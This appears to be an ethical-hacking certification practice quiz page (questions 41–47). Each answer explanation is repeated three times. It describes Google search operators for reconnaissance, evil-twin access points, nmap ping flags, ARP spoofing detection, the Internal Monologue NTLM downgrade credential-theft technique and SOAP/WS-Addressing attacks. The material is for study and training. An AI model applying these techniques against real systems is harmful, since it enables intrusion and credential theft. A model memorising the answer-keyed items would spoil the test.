https://en.wikipedia.org/wiki/Payment_Card_Industry_Data_Security_Standard The Payment Card Industry Data Security Standard (PCI DSS) is an information security standard for organizations that handle branded credit cards from the major card schemes. The PCI Standard is mandated by the card brands but administered by the Payment Card Industry Security Standards Council. The standard was created to increase controls around cardholder data to reduce credit card fraud. Validation of compliance is performed annually or quarterly better source needed] by a method suited to the volume of transactions handled: Self-Assessment Questionnaire (SAQ) smaller volumes; External Qualified Security Assessor (QSA) moderate volumes; involves an Attestation on Compliance (AOC); Firm-specific Internal Security Assessor (ISA) larger volumes; involves issuing a Report on Compliance (ROC). Incorrect answers: FISMA https://en.wikipedia.org/wiki/Federal_Information_Security_Management_Act_of_2002 The Federal Information Security Management Act of 2002 (FISMA, 44 U.S.C. § 3541, et seq.) is a United States federal law enacted in 2002 as Title III of the E-Government Act of 2002 (Pub.L. 107347 (text) (pdf), 116 Stat. 2899). The act recognized the importance of information security to the economic and national security interests of the United States. The act requires each federal agency to develop, document, and implement an agency-wide program to provide information security for the information and information systems that support the operations and assets of the agency, including those provided or managed by another agency, contractor, or other source. FISMA has brought attention within the federal government to cybersecurity and explicitly emphasized a “risk-based policy for cost-effective security.“ FISMA requires agency program officials, chief information officers, and inspectors general (IGs) to conduct annual reviews of the agency‘s information security program and report the results to Office of Management and Budget (OMB). OMB uses this data to assist in its oversight responsibilities and to prepare this annual report to Congress on agency compliance with the act. In FY 2008, federal agencies spent $6.2 billion securing the government‘s total information technology investment of approximately $68 billion or about 9.2 percent of the total information technology portfolio. Sarbanes-Oxley Act https://en.wikipedia.org/wiki/Sarbanes%E2%80%93Oxley_Act The SarbanesOxley Act of 2002 is a United States federal law that mandates certain practices in financial record keeping and reporting for corporations. The act, (Pub.L. 107204 (text) (pdf), 116 Stat. 745, enacted July 30, 2002), also known as the “Public Company Accounting Reform and Investor Protection Act“ (in the Senate) and “Corporate and Auditing Accountability, Responsibility, and Transparency Act“ (in the House) and more commonly called SarbanesOxley or SOX, contains eleven sections that place requirements on all U.S. public company boards of directors and management and public accounting firms. A number of provisions of the Act also apply to privately held companies, such as the willful destruction of evidence to impede a federal investigation. The law was enacted as a reaction to a number of major corporate and accounting scandals, including Enron and WorldCom. The sections of the bill cover responsibilities of a public corporation‘s board of directors, add criminal penalties for certain misconduct, and require the Securities and Exchange Commission to create regulations to define how public corporations are to comply with the law. HIPAA https://en.wikipedia.org/wiki/Health_Insurance_Portability_and_Accountability_Act The Health Insurance Portability and Accountability Act of 1996 (HIPAA or the KennedyKassebaum Act) is a United States federal statute enacted by the 104th United States Congress and signed into law by President Bill Clinton on August 21, 1996. It modernized the flow of healthcare information, stipulates how personally identifiable information maintained by the healthcare and healthcare insurance industries should be protected from fraud and theft, and addressed some limitations on healthcare insurance coverage. It generally prohibits healthcare providers and healthcare businesses, called covered entities, from disclosing private information to anyone other than a patient and the patient‘s authorized representatives. It does not restrict patients from receiving information about themselves, prohibit them from voluntarily sharing their private health information however they choose, or if they disclose private medical information to family members, friends, or other private individuals legally require those non-covered people to maintain confidentiality.
Question 41 of 65
41. Question
Identify Google advanced search operator which helps an attacker gather information about websites that are similar to a specified target URL?
Correct
https://ktflash.gitbooks.io/ceh_v9/content/222_footprinting_using_advanced_google_hacking_tec.html [related:] Lists web pages that are similar to a specified web page. Incorrect answers: [link:] Lists web pages that have links to the specified web page. [site:] Restricts the results to those websites in the given domain. [inurl:] Restricts the results to documents containing the search keyword in the URL.
Incorrect
https://ktflash.gitbooks.io/ceh_v9/content/222_footprinting_using_advanced_google_hacking_tec.html [related:] Lists web pages that are similar to a specified web page. Incorrect answers: [link:] Lists web pages that have links to the specified web page. [site:] Restricts the results to those websites in the given domain. [inurl:] Restricts the results to documents containing the search keyword in the URL.
Unattempted
https://ktflash.gitbooks.io/ceh_v9/content/222_footprinting_using_advanced_google_hacking_tec.html [related:] Lists web pages that are similar to a specified web page. Incorrect answers: [link:] Lists web pages that have links to the specified web page. [site:] Restricts the results to those websites in the given domain. [inurl:] Restricts the results to documents containing the search keyword in the URL.
Question 42 of 65
42. Question
Which of the following types of attack does the use of Wi-Fi Pineapple belong to run an access point with a legitimate-looking SSID for a nearby business?
Correct
https://terranovasecurity.com/wi-fi-pineapple-cyber-security-threat/ A Wi-Fi Pineapple is a wireless auditing platform from Hak5 that allows network security administrators to conduct penetration tests. Pen tests are a type of ethical hacking in which white hat hackers seek out security vulnerabilities that a black hat attacker could exploit. The labels white hat and black hat are derived from old-time Western movies in which the good guys wore white hats and the bad guys wore black hats. A Wi-Fi Pineapple can also be used as a rogue access point (AP) to conduct man-in-the-middle (MitM) attacks. A MiTM attack is one in which the attacker secretly intercepts and relays messages between two parties that believe they are communicating directly with each other. The inexpensive price and friendly user interface (UI) enable attackers with little technical knowledge to eavesdrop on computing devices using public Wi-Fi networks in order to collect sensitive personal information, including passwords. Uses of Wi-Fi Pineapple The Pineapple was originally invented by engineers at Hak5 to perform pen tests and help network administrators audit network security. The AP, which some people think resembles a spider instead of a pineapple, enables network engineers to hack their own network in order to identify vulnerabilities and put mechanisms in place to strengthen the network against potential attackers. When a Pineapple is used for pen testing, it is referred to as a honeypot. When a Pineapple is used as a rogue AP to conduct MitM security exploits, it is referred to as an evil twin or pineapple sandwich.
Incorrect
https://terranovasecurity.com/wi-fi-pineapple-cyber-security-threat/ A Wi-Fi Pineapple is a wireless auditing platform from Hak5 that allows network security administrators to conduct penetration tests. Pen tests are a type of ethical hacking in which white hat hackers seek out security vulnerabilities that a black hat attacker could exploit. The labels white hat and black hat are derived from old-time Western movies in which the good guys wore white hats and the bad guys wore black hats. A Wi-Fi Pineapple can also be used as a rogue access point (AP) to conduct man-in-the-middle (MitM) attacks. A MiTM attack is one in which the attacker secretly intercepts and relays messages between two parties that believe they are communicating directly with each other. The inexpensive price and friendly user interface (UI) enable attackers with little technical knowledge to eavesdrop on computing devices using public Wi-Fi networks in order to collect sensitive personal information, including passwords. Uses of Wi-Fi Pineapple The Pineapple was originally invented by engineers at Hak5 to perform pen tests and help network administrators audit network security. The AP, which some people think resembles a spider instead of a pineapple, enables network engineers to hack their own network in order to identify vulnerabilities and put mechanisms in place to strengthen the network against potential attackers. When a Pineapple is used for pen testing, it is referred to as a honeypot. When a Pineapple is used as a rogue AP to conduct MitM security exploits, it is referred to as an evil twin or pineapple sandwich.
Unattempted
https://terranovasecurity.com/wi-fi-pineapple-cyber-security-threat/ A Wi-Fi Pineapple is a wireless auditing platform from Hak5 that allows network security administrators to conduct penetration tests. Pen tests are a type of ethical hacking in which white hat hackers seek out security vulnerabilities that a black hat attacker could exploit. The labels white hat and black hat are derived from old-time Western movies in which the good guys wore white hats and the bad guys wore black hats. A Wi-Fi Pineapple can also be used as a rogue access point (AP) to conduct man-in-the-middle (MitM) attacks. A MiTM attack is one in which the attacker secretly intercepts and relays messages between two parties that believe they are communicating directly with each other. The inexpensive price and friendly user interface (UI) enable attackers with little technical knowledge to eavesdrop on computing devices using public Wi-Fi networks in order to collect sensitive personal information, including passwords. Uses of Wi-Fi Pineapple The Pineapple was originally invented by engineers at Hak5 to perform pen tests and help network administrators audit network security. The AP, which some people think resembles a spider instead of a pineapple, enables network engineers to hack their own network in order to identify vulnerabilities and put mechanisms in place to strengthen the network against potential attackers. When a Pineapple is used for pen testing, it is referred to as a honeypot. When a Pineapple is used as a rogue AP to conduct MitM security exploits, it is referred to as an evil twin or pineapple sandwich.
Question 43 of 65
43. Question
The date and time of the remote host can theoretically be used against some systems to use weak time-based random number generators in other services. Which option in Zenmap will allow you to make ICMP Timestamp ping?
Correct
https://nmap.org/book/host-discovery-techniques.html Dont ping – nmap -PN [target] UDP ping – Nmap -PU [target] ICMP Timestamp ping nmap – nmap -PP [target] SCTP Init Ping – nmap -PY [target] NOTE: https://nmap.org/zenmap/ Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open-source application that aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows the interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.
Incorrect
https://nmap.org/book/host-discovery-techniques.html Dont ping – nmap -PN [target] UDP ping – Nmap -PU [target] ICMP Timestamp ping nmap – nmap -PP [target] SCTP Init Ping – nmap -PY [target] NOTE: https://nmap.org/zenmap/ Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open-source application that aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows the interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.
Unattempted
https://nmap.org/book/host-discovery-techniques.html Dont ping – nmap -PN [target] UDP ping – Nmap -PU [target] ICMP Timestamp ping nmap – nmap -PP [target] SCTP Init Ping – nmap -PY [target] NOTE: https://nmap.org/zenmap/ Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform (Linux, Windows, Mac OS X, BSD, etc.) free and open-source application that aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows the interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.
Question 44 of 65
44. Question
Alexa, a college student, decided to go to a cafe. While waiting for her order, she decided to connect to a public Wi-Fi network without additional security tools such as a VPN. How can she verify that nobody is not performing an ARP spoofing attack on her laptop?
Correct
https://www.comparitech.com/blog/information-security/arp-poisoning-spoofing-detect-prevent/ ARP poisoning can be detected in several different ways. You can use Windows Command Prompt, an open-source packet analyzer such as Wireshark, or proprietary options such as XArp. You can check the ARP attack in Command Prompt. First, open Command Prompt as an administrator. In the command line, enter: arp -a If the table contains two different IP addresses that share the same MAC address, then you are probably undergoing an ARP poisoning attack. You can read about other ways of detecting ARP spoofing here: Wireshark: https://media.neliti.com/media/publications/263063-arp-spoofing-detection-via-wireshark-and-9a79ced5.pdf XArp: http://www.xarp.net/#support
Incorrect
https://www.comparitech.com/blog/information-security/arp-poisoning-spoofing-detect-prevent/ ARP poisoning can be detected in several different ways. You can use Windows Command Prompt, an open-source packet analyzer such as Wireshark, or proprietary options such as XArp. You can check the ARP attack in Command Prompt. First, open Command Prompt as an administrator. In the command line, enter: arp -a If the table contains two different IP addresses that share the same MAC address, then you are probably undergoing an ARP poisoning attack. You can read about other ways of detecting ARP spoofing here: Wireshark: https://media.neliti.com/media/publications/263063-arp-spoofing-detection-via-wireshark-and-9a79ced5.pdf XArp: http://www.xarp.net/#support
Unattempted
https://www.comparitech.com/blog/information-security/arp-poisoning-spoofing-detect-prevent/ ARP poisoning can be detected in several different ways. You can use Windows Command Prompt, an open-source packet analyzer such as Wireshark, or proprietary options such as XArp. You can check the ARP attack in Command Prompt. First, open Command Prompt as an administrator. In the command line, enter: arp -a If the table contains two different IP addresses that share the same MAC address, then you are probably undergoing an ARP poisoning attack. You can read about other ways of detecting ARP spoofing here: Wireshark: https://media.neliti.com/media/publications/263063-arp-spoofing-detection-via-wireshark-and-9a79ced5.pdf XArp: http://www.xarp.net/#support
Question 45 of 65
45. Question
The attacker disabled the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic. His next step was to extract all the non-network logon tokens from all the active processes to masquerade as a legitimate user to launch further attacks. Which of the following attacks was performed by the attacker?
Correct
https://github.com/eladshamir/Internal-Monologue The Internal monologue attack allows NTLMv1 challenge-response hashes to be obtained from the victims system, without injecting code in the memory or interacting with protected services such as the Local Security Authority Subsystem Service (LSASS). These hashes can then be cracked or subsequently used in a Pass-The-Hash (PTH) attack. This technique allows a tester to obtain credentials from the system without touching the LSASS process. The attack takes advantage of the NetNTLMv1 challenge-response protocol. The NetNTLMv1 protocol is insecure due to the way it calculates the challenge-response allowing an attacker to retrieve the NTLM hash by easily cracking the response. Furthermore, retrieving the NTLM hash of a user is almost synonymous to retrieving the plaintext password of a user, since it can be used for a Pass the Hash attack technique or can be cracked to obtain the plaintext password. Although most modern systems are configured by default to avoid using NetNTLMv1, because the attacked is a local administrator of the system, a NetNTLM Downgrade attack can be performed to enable this weaker authentication scheme. This will disable preventive controls for NetNTLMv1. The attacker can then retrieve the non-network logon tokens from the running processes and impersonate the associated user. Using the impersonated user privilege, the attacker can invoke a local procedure call to the NTLM authentication package called MSV1_0 to encrypt a known challenge using SSPI secure single sign-on technology in Windows. This will generate a NetNTLMv1 response for that challenge using the impersonated users NTLM hash as a key. Now, due to the weakness in the NetNTLMv1 challenge-response protocol, the tester can easily extract the NTLM hash by cracking this response and perform a Pass the Hash attack. Incorrect answers: Dictionary attack https://en.wikipedia.org/wiki/Dictionary_attack A dictionary attack is a form of brute force attack used for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying thousands or millions of likely possibilities, such as words in a dictionary or previously used passwords, often from lists obtained from past security breaches. Rainbow table attack https://en.wikipedia.org/wiki/Rainbow_table A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a key derivation function (or credit card numbers, etc.) up to a certain length consisting of a limited set of characters. It is a practical example of a spacetime tradeoff, using less computer processing time and more storage than a brute-force attack which calculates a hash on every attempt, but more processing time and less storage than a simple key derivation function with one entry per hash. Use of a key derivation that employs a salt makes this attack infeasible. Phishing attack https://en.wikipedia.org/wiki/Phishing Phishing is a type of social engineering where an attacker sends a fraudulent (“spoofed“) message designed to trick a human victim into revealing sensitive information to the attacker or to deploy malicious software on the victim‘s infrastructure like ransomware. Phishing attacks have become increasingly sophisticated and often transparently mirror the site being targeted, allowing the attacker to observe everything while the victim is navigating the site, and transverse any additional security boundaries with the victim. As of 2020, phishing is by far the most common attack performed by cyber-criminals, with the FBI‘s Internet Crime Complaint Centre recording over twice as many incidents of phishing than any other type of computer crime.
Incorrect
https://github.com/eladshamir/Internal-Monologue The Internal monologue attack allows NTLMv1 challenge-response hashes to be obtained from the victims system, without injecting code in the memory or interacting with protected services such as the Local Security Authority Subsystem Service (LSASS). These hashes can then be cracked or subsequently used in a Pass-The-Hash (PTH) attack. This technique allows a tester to obtain credentials from the system without touching the LSASS process. The attack takes advantage of the NetNTLMv1 challenge-response protocol. The NetNTLMv1 protocol is insecure due to the way it calculates the challenge-response allowing an attacker to retrieve the NTLM hash by easily cracking the response. Furthermore, retrieving the NTLM hash of a user is almost synonymous to retrieving the plaintext password of a user, since it can be used for a Pass the Hash attack technique or can be cracked to obtain the plaintext password. Although most modern systems are configured by default to avoid using NetNTLMv1, because the attacked is a local administrator of the system, a NetNTLM Downgrade attack can be performed to enable this weaker authentication scheme. This will disable preventive controls for NetNTLMv1. The attacker can then retrieve the non-network logon tokens from the running processes and impersonate the associated user. Using the impersonated user privilege, the attacker can invoke a local procedure call to the NTLM authentication package called MSV1_0 to encrypt a known challenge using SSPI secure single sign-on technology in Windows. This will generate a NetNTLMv1 response for that challenge using the impersonated users NTLM hash as a key. Now, due to the weakness in the NetNTLMv1 challenge-response protocol, the tester can easily extract the NTLM hash by cracking this response and perform a Pass the Hash attack. Incorrect answers: Dictionary attack https://en.wikipedia.org/wiki/Dictionary_attack A dictionary attack is a form of brute force attack used for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying thousands or millions of likely possibilities, such as words in a dictionary or previously used passwords, often from lists obtained from past security breaches. Rainbow table attack https://en.wikipedia.org/wiki/Rainbow_table A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a key derivation function (or credit card numbers, etc.) up to a certain length consisting of a limited set of characters. It is a practical example of a spacetime tradeoff, using less computer processing time and more storage than a brute-force attack which calculates a hash on every attempt, but more processing time and less storage than a simple key derivation function with one entry per hash. Use of a key derivation that employs a salt makes this attack infeasible. Phishing attack https://en.wikipedia.org/wiki/Phishing Phishing is a type of social engineering where an attacker sends a fraudulent (“spoofed“) message designed to trick a human victim into revealing sensitive information to the attacker or to deploy malicious software on the victim‘s infrastructure like ransomware. Phishing attacks have become increasingly sophisticated and often transparently mirror the site being targeted, allowing the attacker to observe everything while the victim is navigating the site, and transverse any additional security boundaries with the victim. As of 2020, phishing is by far the most common attack performed by cyber-criminals, with the FBI‘s Internet Crime Complaint Centre recording over twice as many incidents of phishing than any other type of computer crime.
Unattempted
https://github.com/eladshamir/Internal-Monologue The Internal monologue attack allows NTLMv1 challenge-response hashes to be obtained from the victims system, without injecting code in the memory or interacting with protected services such as the Local Security Authority Subsystem Service (LSASS). These hashes can then be cracked or subsequently used in a Pass-The-Hash (PTH) attack. This technique allows a tester to obtain credentials from the system without touching the LSASS process. The attack takes advantage of the NetNTLMv1 challenge-response protocol. The NetNTLMv1 protocol is insecure due to the way it calculates the challenge-response allowing an attacker to retrieve the NTLM hash by easily cracking the response. Furthermore, retrieving the NTLM hash of a user is almost synonymous to retrieving the plaintext password of a user, since it can be used for a Pass the Hash attack technique or can be cracked to obtain the plaintext password. Although most modern systems are configured by default to avoid using NetNTLMv1, because the attacked is a local administrator of the system, a NetNTLM Downgrade attack can be performed to enable this weaker authentication scheme. This will disable preventive controls for NetNTLMv1. The attacker can then retrieve the non-network logon tokens from the running processes and impersonate the associated user. Using the impersonated user privilege, the attacker can invoke a local procedure call to the NTLM authentication package called MSV1_0 to encrypt a known challenge using SSPI secure single sign-on technology in Windows. This will generate a NetNTLMv1 response for that challenge using the impersonated users NTLM hash as a key. Now, due to the weakness in the NetNTLMv1 challenge-response protocol, the tester can easily extract the NTLM hash by cracking this response and perform a Pass the Hash attack. Incorrect answers: Dictionary attack https://en.wikipedia.org/wiki/Dictionary_attack A dictionary attack is a form of brute force attack used for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying thousands or millions of likely possibilities, such as words in a dictionary or previously used passwords, often from lists obtained from past security breaches. Rainbow table attack https://en.wikipedia.org/wiki/Rainbow_table A rainbow table is a precomputed table for caching the output of cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a key derivation function (or credit card numbers, etc.) up to a certain length consisting of a limited set of characters. It is a practical example of a spacetime tradeoff, using less computer processing time and more storage than a brute-force attack which calculates a hash on every attempt, but more processing time and less storage than a simple key derivation function with one entry per hash. Use of a key derivation that employs a salt makes this attack infeasible. Phishing attack https://en.wikipedia.org/wiki/Phishing Phishing is a type of social engineering where an attacker sends a fraudulent (“spoofed“) message designed to trick a human victim into revealing sensitive information to the attacker or to deploy malicious software on the victim‘s infrastructure like ransomware. Phishing attacks have become increasingly sophisticated and often transparently mirror the site being targeted, allowing the attacker to observe everything while the victim is navigating the site, and transverse any additional security boundaries with the victim. As of 2020, phishing is by far the most common attack performed by cyber-criminals, with the FBI‘s Internet Crime Complaint Centre recording over twice as many incidents of phishing than any other type of computer crime.
Question 46 of 65
46. Question
This attack exploits a vulnerability that provides additional routing information in the SOAP header to support asynchronous communication. Also, it further allows the transmission of web-service requests and response messages using different TCP connections. Which of the following attacks matches the description above?
Correct
https://www.ws-attacks.org/WS-Addressing_spoofing The WS-Address standard allows the addition of routing information to the SOAP Header, allowing asynchronous communication. WS-Address spoofing – Generic The generic definition describes the following scenario: An attacker send a SOAP message, containing WS-Address information, to a web service server. The element doesn‘t contain the address of the attacker but instead the web service client who the attacker has chosen to receive the message. This results in unwanted traffic/SOAP messages for the receiving web service client. Depending on the amount of traffic DOS scenarios are possible. However other attack scenarios are possible too. WS-Address spoofing – BPEL Rollback This subtype requires the existence of some sort of BPEL engine. Lets assume that an attacker sends SOAP messages to a web service resulting in the creation of new BPEL process instances. The SOAP message contains a element with an invalid callback endpoint. After the SOAP message gets processed by the BPEL engine, it tries to call the endpoint defined in . This action results in some form of error response such as refused connections or SOAP faults. In return, this error response will be processed by the BPEL engine. In case a BPEL engine gets flooded with many SOAP messages as described above, a high workload for the BPEL engine will result. In the worst case a DOS is the result. This kind of flooding attack is a lot more devastating than regular flooding attacks, since one message results in the call of multiple actions/web service calls that are called by the BPEL engine. The attack only becomes visible once all stages of the BPEL engine are run through. Incorrect answers: SOAPAction spoofing https://www.ws-attacks.org/SOAPAction_Spoofing Each web service request contains some sort of operation that is later executed by the application logic. This operation can be found in the first child element of the SOAP Body. However, if HTTP is used to transport the SOAP message the SOAP standard allows the use of an additional HTTP header element called SOAPAction. This header element contains the name of the executed operation. It is supposed to inform the receiving web service of what operation is contained in the SOAP Body, without having to do any XML parsing. This “optimisation“ can be used by an attacker to mount an attack, since certain web service frameworks determine the operation to be executed solely on the information contained in the SOAPAction attribut. XML Flooding https://www.ws-attacks.org/XML_Flooding XML Flooding (also known XML Flood) aims at exhausting the resources of a web service by sending a large number of legitimate SOAP Messages. This attack can be compared to the classical denial of service attack on web servers by flooding them with a large amount of valid HTTP requests until the server is unable to respond. Soap Array Attack https://www.ws-attacks.org/Soap_Array_Attack SOAP messages are flexible in many ways, even Arrays are supported. If you are new to SOAP arrays check the documentation by the W3C . However this feature that can be exploited by an attacker to cause a denial of service attack to limit the web service availability. Before an SOAP array is used, its size has to be defined, just like with many other programming languages. By default, SOAP doesn‘t limit the number of elements within an array. This property can be exploited by an attacker to execute a DOS attack limiting the availability of the web service. Let‘s assume an attacker declares an array with 1,000,000,000 String elements. Before the message is processed any further by the parser, the web service will reserve space for 1,000,000,000 String Elements in the RAM. In most cases that will lead to memory exhaustion of the attacked system.
Incorrect
https://www.ws-attacks.org/WS-Addressing_spoofing The WS-Address standard allows the addition of routing information to the SOAP Header, allowing asynchronous communication. WS-Address spoofing – Generic The generic definition describes the following scenario: An attacker send a SOAP message, containing WS-Address information, to a web service server. The element doesn‘t contain the address of the attacker but instead the web service client who the attacker has chosen to receive the message. This results in unwanted traffic/SOAP messages for the receiving web service client. Depending on the amount of traffic DOS scenarios are possible. However other attack scenarios are possible too. WS-Address spoofing – BPEL Rollback This subtype requires the existence of some sort of BPEL engine. Lets assume that an attacker sends SOAP messages to a web service resulting in the creation of new BPEL process instances. The SOAP message contains a element with an invalid callback endpoint. After the SOAP message gets processed by the BPEL engine, it tries to call the endpoint defined in . This action results in some form of error response such as refused connections or SOAP faults. In return, this error response will be processed by the BPEL engine. In case a BPEL engine gets flooded with many SOAP messages as described above, a high workload for the BPEL engine will result. In the worst case a DOS is the result. This kind of flooding attack is a lot more devastating than regular flooding attacks, since one message results in the call of multiple actions/web service calls that are called by the BPEL engine. The attack only becomes visible once all stages of the BPEL engine are run through. Incorrect answers: SOAPAction spoofing https://www.ws-attacks.org/SOAPAction_Spoofing Each web service request contains some sort of operation that is later executed by the application logic. This operation can be found in the first child element of the SOAP Body. However, if HTTP is used to transport the SOAP message the SOAP standard allows the use of an additional HTTP header element called SOAPAction. This header element contains the name of the executed operation. It is supposed to inform the receiving web service of what operation is contained in the SOAP Body, without having to do any XML parsing. This “optimisation“ can be used by an attacker to mount an attack, since certain web service frameworks determine the operation to be executed solely on the information contained in the SOAPAction attribut. XML Flooding https://www.ws-attacks.org/XML_Flooding XML Flooding (also known XML Flood) aims at exhausting the resources of a web service by sending a large number of legitimate SOAP Messages. This attack can be compared to the classical denial of service attack on web servers by flooding them with a large amount of valid HTTP requests until the server is unable to respond. Soap Array Attack https://www.ws-attacks.org/Soap_Array_Attack SOAP messages are flexible in many ways, even Arrays are supported. If you are new to SOAP arrays check the documentation by the W3C . However this feature that can be exploited by an attacker to cause a denial of service attack to limit the web service availability. Before an SOAP array is used, its size has to be defined, just like with many other programming languages. By default, SOAP doesn‘t limit the number of elements within an array. This property can be exploited by an attacker to execute a DOS attack limiting the availability of the web service. Let‘s assume an attacker declares an array with 1,000,000,000 String elements. Before the message is processed any further by the parser, the web service will reserve space for 1,000,000,000 String Elements in the RAM. In most cases that will lead to memory exhaustion of the attacked system.
Unattempted
https://www.ws-attacks.org/WS-Addressing_spoofing The WS-Address standard allows the addition of routing information to the SOAP Header, allowing asynchronous communication. WS-Address spoofing – Generic The generic definition describes the following scenario: An attacker send a SOAP message, containing WS-Address information, to a web service server. The element doesn‘t contain the address of the attacker but instead the web service client who the attacker has chosen to receive the message. This results in unwanted traffic/SOAP messages for the receiving web service client. Depending on the amount of traffic DOS scenarios are possible. However other attack scenarios are possible too. WS-Address spoofing – BPEL Rollback This subtype requires the existence of some sort of BPEL engine. Lets assume that an attacker sends SOAP messages to a web service resulting in the creation of new BPEL process instances. The SOAP message contains a element with an invalid callback endpoint. After the SOAP message gets processed by the BPEL engine, it tries to call the endpoint defined in . This action results in some form of error response such as refused connections or SOAP faults. In return, this error response will be processed by the BPEL engine. In case a BPEL engine gets flooded with many SOAP messages as described above, a high workload for the BPEL engine will result. In the worst case a DOS is the result. This kind of flooding attack is a lot more devastating than regular flooding attacks, since one message results in the call of multiple actions/web service calls that are called by the BPEL engine. The attack only becomes visible once all stages of the BPEL engine are run through. Incorrect answers: SOAPAction spoofing https://www.ws-attacks.org/SOAPAction_Spoofing Each web service request contains some sort of operation that is later executed by the application logic. This operation can be found in the first child element of the SOAP Body. However, if HTTP is used to transport the SOAP message the SOAP standard allows the use of an additional HTTP header element called SOAPAction. This header element contains the name of the executed operation. It is supposed to inform the receiving web service of what operation is contained in the SOAP Body, without having to do any XML parsing. This “optimisation“ can be used by an attacker to mount an attack, since certain web service frameworks determine the operation to be executed solely on the information contained in the SOAPAction attribut. XML Flooding https://www.ws-attacks.org/XML_Flooding XML Flooding (also known XML Flood) aims at exhausting the resources of a web service by sending a large number of legitimate SOAP Messages. This attack can be compared to the classical denial of service attack on web servers by flooding them with a large amount of valid HTTP requests until the server is unable to respond. Soap Array Attack https://www.ws-attacks.org/Soap_Array_Attack SOAP messages are flexible in many ways, even Arrays are supported. If you are new to SOAP arrays check the documentation by the W3C . However this feature that can be exploited by an attacker to cause a denial of service attack to limit the web service availability. Before an SOAP array is used, its size has to be defined, just like with many other programming languages. By default, SOAP doesn‘t limit the number of elements within an array. This property can be exploited by an attacker to execute a DOS attack limiting the availability of the web service. Let‘s assume an attacker declares an array with 1,000,000,000 String elements. Before the message is processed any further by the parser, the web service will reserve space for 1,000,000,000 String Elements in the RAM. In most cases that will lead to memory exhaustion of the attacked system.
Question 47 of 65
47. Question
Your company started working with a cloud service provider, and after a while, they were disappointed with their service and wanted to move to another CSP. Which of the following can become a problem when changing to a new CSP?
Correct
https://jaychapel.medium.com/how-much-should-enterprises-worry-about-vendor-lock-in-in-public-cloud-5029bf40fffa The vendor lock-in problem in cloud computing is the situation where customers are dependent (i.e. locked-in) on a single cloud service provider (CSP) technology implementation and cannot easily move to a different vendor without substantial costs or technical incompatibilities. Types of vendor lock-in risks The issue with vendor lock-in is the difficulty in moving to another cloud service provider if something goes awry. You hope that this never has to happen, but its a possibility. There are four primary lock-in risks that youll take working with a single cloud provider. These include: 1. Data transfer risk 2. Application transfer risk 3. Infrastructure transfer risk 4. Human resource knowledge risk Data transfer risk It is not easy to move your data from one CSP to another. A myriad of questions will arise during a data migration process, such as: 1. Who is responsible for extracting the data from the cloud databases and data warehouses? 2. In what format will the data be? Will that format work with the new cloud provider, or will significant changes need to be made to the data? 3. How can the data be transferred without loss of application functionality? 4. How long will it take and how much will it cost to move all of this data? While some industry groups have tried to create standards for data interchange, sometimes its difficult for companies to implement them due to their unique business requirements. Application transfer risk If you build an application on one CSP that leverages many of its offerings, the reconfiguration of this application to run natively on another provider can be an extremely expensive and difficult process. For instance, lets say youve developed a business intelligence platform on Microsoft Azure. You leverage basic cloud services like compute, storage, databases, and networking. But the app also includes Azures machine learning, data lake analytics, and bot services. Can you imagine all the changes youll have to make to your application if you had to move this to another CSP? One reason for this difficulty is a lack of standard interfaces and open APIs. Every CSP has their own proprietary specifications and standards, which make it very tough to move from one to another. Another reason is that technology and customer needs change so rapidly. You know first hand that your customers and partners continuously demand changes and improvements to your product. The faster that you add and edit features of your cloud-native application, the deeper entrenched you get with your CSP, and the tougher it will be to move to another cloud vendor. Infrastructure transfer risk Every major CSP does things a little bit differently. Virtual machine formats and their associated pricing vary from vendor to vendor, making it difficult to ensure that you have the appropriate resource usage and cost savings if you switch providers. Database offerings and formats may differ as well. And one cloud provider may have more attractive offerings in certain infrastructure components, while lacking in other services that you may need. These differences in the underlying infrastructure result in difficulties moving from one cloud service provider to another. Human resource knowledge risk If youve been working with a single CSP, your IT team has likely gained a lot of institutional knowledge about that providers tools and configurations. If you have to move your applications to another CSP, it will take time for your engineers to ramp up their knowledge of the new cloud platform. Theyll have to learn about new infrastructure formats, implementation processes, and more. Additionally, any newly required certifications will take a long time to earn. The knowledge risk is a factor that isnt often thought about, but is just as important as the risks highlighted above.
Incorrect
https://jaychapel.medium.com/how-much-should-enterprises-worry-about-vendor-lock-in-in-public-cloud-5029bf40fffa The vendor lock-in problem in cloud computing is the situation where customers are dependent (i.e. locked-in) on a single cloud service provider (CSP) technology implementation and cannot easily move to a different vendor without substantial costs or technical incompatibilities. Types of vendor lock-in risks The issue with vendor lock-in is the difficulty in moving to another cloud service provider if something goes awry. You hope that this never has to happen, but its a possibility. There are four primary lock-in risks that youll take working with a single cloud provider. These include: 1. Data transfer risk 2. Application transfer risk 3. Infrastructure transfer risk 4. Human resource knowledge risk Data transfer risk It is not easy to move your data from one CSP to another. A myriad of questions will arise during a data migration process, such as: 1. Who is responsible for extracting the data from the cloud databases and data warehouses? 2. In what format will the data be? Will that format work with the new cloud provider, or will significant changes need to be made to the data? 3. How can the data be transferred without loss of application functionality? 4. How long will it take and how much will it cost to move all of this data? While some industry groups have tried to create standards for data interchange, sometimes its difficult for companies to implement them due to their unique business requirements. Application transfer risk If you build an application on one CSP that leverages many of its offerings, the 